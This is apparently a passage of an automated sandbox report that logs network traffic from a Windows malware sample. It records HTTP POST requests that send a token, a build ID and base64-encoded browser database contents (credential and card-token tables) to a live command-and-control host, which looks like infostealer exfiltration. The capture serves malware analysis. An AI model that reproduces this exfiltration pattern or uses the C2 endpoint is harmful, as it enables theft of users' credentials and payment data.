                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:37 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:37 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.44972895.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:37 UTC297OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----1v3ekxb16p8qqq90r168
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 55081
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 31 76 33 65 6b 78 62 31 36 70 38 71 71 71 39 30 72 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 31 76 33 65 6b 78 62 31 36 70 38 71 71 71 39 30 72 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 31 76 33 65 6b 78 62 31 36 70 38 71 71 71 39 30 72 31 36 38 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------1v3ekxb16p8qqq90r168Content-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------1v3ekxb16p8qqq90r168Content-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------1v3ekxb16p8qqq90r168Cont
                                                                                    2025-03-07 19:45:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:37 UTC16355OUTData Raw: 43 42 4a 54 6c 52 46 52 30 56 53 4c 43 42 7a 61 47 46 79 61 57 35 6e 58 32 35 76 64 47 6c 6d 61 57 4e 68 64 47 6c 76 62 6c 39 6b 61 58 4e 77 62 47 46 35 5a 57 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 47 74 6c 65 57 4e 6f 59 57 6c 75 58 32 6c 6b 5a 57 35 30 61 57 5a 70 5a 58 49 67 51 6b 78 50 51 69 77 67 63 32 56 75 5a 47 56 79 58 33 42 79 62 32 5a 70 62 47 56 66 61 57 31 68 5a 32 56 66 64 58 4a 73 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b
                                                                                    Data Ascii: CBJTlRFR0VSLCBzaGFyaW5nX25vdGlmaWNhdGlvbl9kaXNwbGF5ZWQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIGtleWNoYWluX2lkZW50aWZpZXIgQkxPQiwgc2VuZGVyX3Byb2ZpbGVfaW1hZ2VfdXJsIFZBUkNIQVIsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3Jk
                                                                                    2025-03-07 19:45:37 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:39 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:39 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:45:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.44972995.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:41 UTC298OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----p8q1n7gvkng47y5x47y5
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 186149
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:41 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 70 38 71 31 6e 37 67 76 6b 6e 67 34 37 79 35 78 34 37 79 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 70 38 71 31 6e 37 67 76 6b 6e 67 34 37 79 35 78 34 37 79 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 70 38 71 31 6e 37 67 76 6b 6e 67 34 37 79 35 78 34 37 79 35 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------p8q1n7gvkng47y5x47y5Content-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------p8q1n7gvkng47y5x47y5Content-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------p8q1n7gvkng47y5x47y5Cont
                                                                                    2025-03-07 19:45:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:41 UTC16355OUTData Raw: 66 64 47 56 34 64 43 42 57 51 56 4a 44 53 45 46 53 4c 43 42 31 63 32 46 6e 5a 56 39 70 62 6e 4e 30 63 6e 56 6a 64 47 6c 76 62 6e 4e 66 64 47 56 34 64 43 42 57 51 56 4a 44 53 45 46 53 4b 59 46 30 47 41 63 58 52 55 55 42 67 6d 74 30 59 57 4a 73 5a 58 4e 6c 63 6e 5a 6c 63 6c 39 6a 59 58 4a 6b 58 32 4e 73 62 33 56 6b 58 33 52 76 61 32 56 75 58 32 52 68 64 47 46 7a 5a 58 4a 32 5a 58 4a 66 59 32 46 79 5a 46 39 6a 62 47 39 31 5a 46 39 30 62 32 74 6c 62 6c 39 6b 59 58 52 68 48 45 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 5a 58 4a 32 5a 58 4a 66 59 32 46 79 5a 46 39 6a 62 47 39 31 5a 46 39 30 62 32 74 6c 62 6c 39 6b 59 58 52 68 49 43 68 70 5a 43 42 57 51 56 4a 44 53 45 46 53 4c 43 42 7a 64 57 5a 6d 61 58 67 67 56 6b 46 53 51 30 68 42 55 69 77 67 5a 58
                                                                                    Data Ascii: fdGV4dCBWQVJDSEFSLCB1c2FnZV9pbnN0cnVjdGlvbnNfdGV4dCBWQVJDSEFSKYF0GAcXRUUBgmt0YWJsZXNlcnZlcl9jYXJkX2Nsb3VkX3Rva2VuX2RhdGFzZXJ2ZXJfY2FyZF9jbG91ZF90b2tlbl9kYXRhHENSRUFURSBUQUJMRSBzZXJ2ZXJfY2FyZF9jbG91ZF90b2tlbl9kYXRhIChpZCBWQVJDSEFSLCBzdWZmaXggVkFSQ0hBUiwgZX
                                                                                    2025-03-07 19:45:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:42 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:42 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.449742142.250.186.684437376C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:44 UTC504OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                    Host: www.google.com
                                                                                    Connection: keep-alive
                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJKhywEInP7MAQiFoM0BCL7VzgEIgNbOAQjB2M4BCMjczgEIiuDOAQiu5M4BCIvlzgE=
                                                                                    Sec-Fetch-Site: cross-site
                                                                                    Sec-Fetch-Mode: no-cors
                                                                                    Sec-Fetch-Dest: empty
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
